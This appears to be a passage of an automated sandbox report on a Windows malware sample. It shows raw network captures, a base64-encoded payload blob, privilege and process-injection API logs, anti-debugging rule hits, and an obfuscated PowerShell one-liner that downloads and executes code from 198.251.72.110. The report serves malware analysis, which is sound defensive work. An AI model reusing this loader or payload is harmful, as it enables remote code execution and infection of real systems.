ëä«91:QP¿ÚÊúõ:HrŒÂ|YÐL‹-̝wVš/×ÂìÓõá½D²>ÇFv¹¼™\ÀU։ÐÝo2æÿìH0F!¾žÈìåY,jr9îÉÖlý;–ÂxNX~Çü Úä“!˜æò _+ç+)—ô ±&jë"ý|ÏQP‹©7!˜!^0  *†H†÷  ‚`ÞïŒF˜ýñíl¡û9ÜEw©*»D7žiB?òmœœ’_F©Ë]$%6¼ZÃ.Ê<]uFùòç|Ñ4ïlR^.·È¡#ǀka¾Òâ”9o;«6¸Î]*˜…/”Ñ㕷N“аpφ+ÿðS·ëYÊöu?òÌ<D4ëªå“>s»Ât\?¸:Ãt{_hGqêÃB&˜pýÓ#ŠïîÛ ªAvü«"¤]yq©J 6ý,×ÍX¢êž^£²¡ç“A•øà)¹|˜€Û¤ŠDS—“î‡WŽÊƒ?¤ôÉó]žg}ü£¨¿_½qWâŽóÎ&^‘yÔ0‚Ð0‚¸ 0  *†H†÷  0ƒ1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.110/U(Go Daddy Root Certificate Authority - G20 110503070000Z 310503070000Z0´1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.1-0+U $http://certs.godaddy.com/repository/1301U*Go Daddy Secure Certificate Authority - G20‚"0  *†H†÷ ‚0‚ ‚¹àËÔ¯v½Ô“bë0d¸lÃÙbŽ/ÿ>eϏÎbæ<RÚEKU«xkcƒbÎil™È‹LÌE3êˆÜž£¯+þ€ayWÄÏ.ô?0<]Güš¼Ã7–AQŽKTø(¾ÐŒ¾ð08ó°&øfGcmÞq&G8GSÑF´ãÜêE¬½¼qÙªoÛÛÍ0:yO_LGøï[Âĝ`;±²C‘ؤ3Nê³Ö'O­%Š¥ÆôÕЦ®tdWˆµDUÔ-*:>ø¸½é2 ”dÄ:PñJ®çy3¯ èß9ÂilcRúwÁÈt‡È¹“PT5KiN¼;ÓI.ÜÁÒRû£‚0‚0Uÿ0ÿ0Uÿ0U@½'ŽÌ4ƒ0¢3×ûl³ð´,€Î0U#0€:š…g(¶ïö½An Á”ÚÞ04+(0&0$+0†http://ocsp.godaddy.com/05U.0,0* ( &†$http://crl.godaddy.com/gdroot-g2.crl0FU ?0=0;U 0301+%https://certs.godaddy.com/repository/0  *†H†÷  ‚~l“È8¸–©Kÿ¡_Oïl>œˆÉP¦s÷W1¾¼ä/ÛøºÓ[à´çæyb ¢×jcs1µõ¨H¤;-¢]×´|%OV0ĶD{,å^æï aª¿ä*¸ƒ}ÁCÎD§p ‘ôÈ­ƒ`ÙØr¨s$µ¬"ʉbXD«‰%ÍÄbÛQ´ÓQ*›ô¼süvÎ6¤ÍÙØ,ꮛõ*²ÑMuŠ?ŠA#}[Kþ¤X›F²Ã``ƒø}PAΡÃ»ï/ÒTîDÙ ®§Š3í±-v6&ÜëŸ÷a܇oîF–(­¡&} §.£¼ø¼00‚}0‚e ç0  *†H†÷  0c1 0 UUS1!0U The Go Daddy Group, Inc.110/U (Go Daddy Class 2 Certification Authority0 140101070000Z 310530070000Z0ƒ1 0 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.110/U(Go Daddy Root Certificate Authority - G20‚"0  *†H†÷ ‚0‚ ‚¿qbñúY4÷É£÷€IXé"ƒ¦Å C;„ñæ…IŸ'êö„N ´Ûp˜Ç2±>NîôúO/Y0"ç«Vkâ€üóu€9Q{åù5¶tN©‚ä¶?©ƒú¢¾ŠjÞ Ã¶Êêè”;F|2 óf"ȍim6Œ·Ó²`´8úŒÎÓÝFÞ >ë]|È|û°+S¤’biQ%aDŒ,©C–#߬:š)Å©é]¶žž0 9Îñˆ€ûK]Ì2ì…bC%4V'‘´;p*?n±èœˆ}ŸÔùÛSm`¿,çX«¸_FüÎÄ< ëI1\iF³àG£‚0‚0Uÿ0ÿ0Uÿ0U:š…g(¶ïö½An Á”ÚÞ0U#0€ÒİґÔLq³aË=¡þݨjÔã04+(0&0$+0†http://ocsp.godaddy.com/02U+0)0' % #†!http://crl.godaddy.com/gdroot.crl0FU ?0=0;U 0301+%https://certs.godaddy.com/repository/0  *†H†÷  ‚Y S½’†§${í[1ÏlpŸn¾N»ö¾—Pá0º(\b”Âã~3÷ûBv…Û•Œ"Xu ˆeg9  Å 8—¤Å#“?´¦D‘ã§i'´Z%:·2Í݄ÿ*8)3¤Ýg²…þ¡ˆ P‰ÈÜ*öB7LæˆßÕ¯$ò±Ãß̵ìà™^·IT <” ÇRI¤má³X
Data received ÉØìÙ®2Ž(p âþ¦ž„½Wp³Zé †S»ï|ÿi àH÷“ È TĬ]g7lÊ¥/17ªnoŒ¼›âW]$¯——œ„­l¬7Lfóa‘ ä¾0Ÿz¤) °á4_dw@Qߌ0¦¯0‚0‚è 0  *†H†÷ 0c1 0 UUS1!0U The Go Daddy Group, Inc.110/U (Go Daddy Class 2 Certification Authority0 040629170620Z 340629170620Z0c1 0 UUS1!0U The Go Daddy Group, Inc.110/U (Go Daddy Class 2 Certification Authority0‚ 0  *†H†÷ ‚ 0‚‚ޝ×êWI¡[ë×_H†ê¾Ýÿäïgôeh³Wq ^w»í›Iép€=VcoÚòÌÐ?T"TزÔÀu=KÇwÃ>x«µ k/j+±Åˆ~Ä»°ÁØE'oª7X÷‡&×Ø-ö©·r6N¦?e˜’Û*n]¢þˆà ÞåáëË:Õâ¢-؎¯_= ¶\¥e8E™£``tÅA¥rbbÅo_B¾Qe¨®#jüx©M€Ãú«Zü¡@¤Êþ²Èï^s îw½šöy˜¼±g¢ Ý XÆD{ >b(_ºASXÏ~8tÅøÿµi„tê—¯£À0½0UÒİґÔLq³aË=¡þݨjÔã0U#…0‚€ÒİґÔLq³aË=¡þݨjÔã¡g¤e0c1 0 UUS1!0U The Go Daddy Group, Inc.110/U (Go Daddy Class 2 Certification Authority‚0 U0ÿ0  *†H†÷ ‚2Kó²Ê>‘üÆ¡ŒŽw 3\÷¦= ù‡€niä–0ÿ4‘cr8îÌ£”(¤1özÄT×öå1X¢ÌÎb۔Esµ¿EÉ$µÕ‚­#yi¸¶MÎÏLÊ3#航‹AnÉ å‰žÍ;Úp÷~™& T%«ns…æ›! l‚¨ø úl–ï‡ Äa‹­îƒ+•øŽ’„r9ë êƒíƒÍ—n¼ëN&¶s+äÓöLþ&qâatJÿW‡uH.ÏQi a•ÕÑ@²LîĬC¦¥ž Օbš ψ‚Å2 ä+ŸEæ Ÿ(œ±¹*ZW­7¯Û½Ÿ
Data received K
Data received GA%ž¿B¼ò@v¾³)®Ù9žJ}äÈ1#×é‡y`¢Ë´ƒáàVð¸WWgޓý(ÈMH³âG`0ëé0äsNï†7_„S:—y´ü´%ÚªØå˜V Ígæ¬ð)˜hÀÿ-u÷ëÔpã2â$iþMGiødô‡¦u6'ñk¶²žª£1y/µàòõëñÉ«qÓ­”Ìé±*_3ÔëÈʋ\‡!uCßôØõ¼£p¢„£^4ê^dòã"Å~ïØ!Þ`Lm_Cã›Ë:™jáTh¾œrhCø´?¥dÙj]"Ôì8¥IHXBZ*Z*ÅàwƍqÑLٔH/äײšçxWí³õÛá H{Š¡ò;¾„„£"¾‚¾ò‘Cà+loQçÿ*‡Ýñ–^#ýÙçÆvî$ptð
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ªlkù0î\È|quä™ZC#¾Aù0!_1çwÿªØÊѯ¹§]â^[M„*Á¬ê‰ô
Data received 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ECAABzEgAACnoAONX///8AfgMAAAQJew0AAAQRBig4AAAGFv4BEyYgHwAAADjTAQAAOAcAAAATBTgjAwAAESU5xf///yAcAAAAOLYBAAA4DwAAADhzAwAAOTsAAAA47wAAABEMKDYAAAYTDyAbAAAAOI8BAAA4BwAAABMXOOoAAAARITrL////IAEAAAA4cgEAAHMSAAAKegMRBB9QWCguAAAGODsBAAADEQQfVFgoLgAABjifAwAAFjiMAwAAfgcAAAQJewwAAAQRBREJIAAwAAAfQCgzAAAGOG3+//8RDBb+ATgSBAAAERg5IAMAACAGAAAAOAsBAAA4BwAAABMROMv9//8RJzm6BAAAICQAAAA47gAAADgKAAAAOZ0BAAA4awIAACgvAAAGGv4BEyQgGAAAADjLAAAAcxIAAAp6EQURCP4BOKQBAAARFjgH////fgoAAAQJewwAAAQRCCgyAAAGFv4DOA////8RFzkm////IB0AAAAXOocAAAAmOAcAAAATDThCAwAAAxEdER8WER+OaSg1AAAGIAsAAAA4YQAAADgHAAAAEwQ4oQEAABEmOS3+//84Iv7//yYgCAAAADg+AAAAcxIAAAp6ABENHyhYEw0gDwAAADgmAAAAOAcAAAATCTi+/v//ERoRDv4EEyE4fv7//yAOAAAA/g4pAP4MKQBFJQAAAIr8//+x/f//4f7//yP9//8p////pwIAAGwBAACp/P//QP3//+n8//8UAAAASwIAAJz+//+QAgAAoAAAAKgBAAAcAgAARvz//4AAAAAG/f//9gIAACP9//8pAQAA0QEAAMz8///Y/f//lP3//0wAAABm/f//9f3//1z+//8G////Gf///3n+///rAQAAQf///yMDAAAgGQAAACgpAAAGOlj///84U////3MSAAAKegA4jgIAAAB+BQAABAl7DQAABBEGKDEAAAYW/gE4Wfz//xEUOWsCAAAgBQAAADgb////OAcAAAATFjhV/v//fggAAAQJewwAAAQRBx5YEQ8aEgFvXQAABhb+ARMiIBQAAAA45/7//zgHAAAAExM4ggAAABEGHywRDBEQWJ4gIQAAADjH/v//cxIAAAp6Ax88KC4AAAY4WP7//wMRBB80WCguAAAGONb8//8gswAAAI0PAAABOIr7//8RBhYgAgABADhx+///KC8AAAYa/gE45fv//xESOIv9//8AfgYAAAQJew0AAAQRBigwAAAGFv4BOHf///8REzkF////IAoAAAAoKQAABjpD/v//OD7+//84H/7//wADEQ0fDFgoLgAABji2AAAAAxENHxBYKC4AAAY4n/v//wMRDR8UWCguAA
Data sent GET /ALL.txt HTTP/1.1 Host: 198.251.72.110 Connection: Keep-Alive
Data sent zv`^™›ÈXDâï¢AUéK]ׁýê]b0þÕ$Ó}³/5 ÀÀÀ À 285ÿia801407.us.archive.org  
Data sent FBAoud큌dÅq,?[»åcŒr;ˆœ pÒª,ÙõòOœ%ê-ð™%I?v—ÑŸÍÊZ]`ECl^ae10Sñ³MõÔË5ÆÆ¢<:­Ì<tÛ´}pD猄Êdñþwca_€ ÿ²ø®¡»
Data sent GET /Server.txt HTTP/1.1 Host: 198.251.72.110
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_files_operation
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:6532 CREDAT:79873
host 198.251.72.110
Time & API Arguments Status Return Repeated

send

 buffer: GET /ALL.txt HTTP/1.1 Host: 198.251.72.110 Connection: Keep-Alive
socket: 1508
sent: 71
1 71 0

send

 buffer: zv`^™›ÈXDâï¢AUéK]ׁýê]b0þÕ$Ó}³/5 ÀÀÀ À 285ÿia801407.us.archive.org  
socket: 1520
sent: 127
1 127 0

send

 buffer: FBAoud큌dÅq,?[»åcŒr;ˆœ pÒª,ÙõòOœ%ê-ð™%I?v—ÑŸÍÊZ]`ECl^ae10Sñ³MõÔË5ÆÆ¢<:­Ì<tÛ´}pD猄Êdñþwca_€ ÿ²ø®¡»
socket: 1520
sent: 134
1 134 0

send

 buffer: GET /Server.txt HTTP/1.1 Host: 198.251.72.110
socket: 1508
sent: 50
1 50 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
parent_process iexplore.exe martian_process Powershell $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://198.251.72.110/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1
Process injection Process 6532 resumed a thread in remote process 4168
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000036c
suspend_count: 1
process_identifier: 4168
1 0 0
option -exec bypass value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Program Files\DVD Maker\DVDMaker.exe
file C:\Windows\System32\unregmp2.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe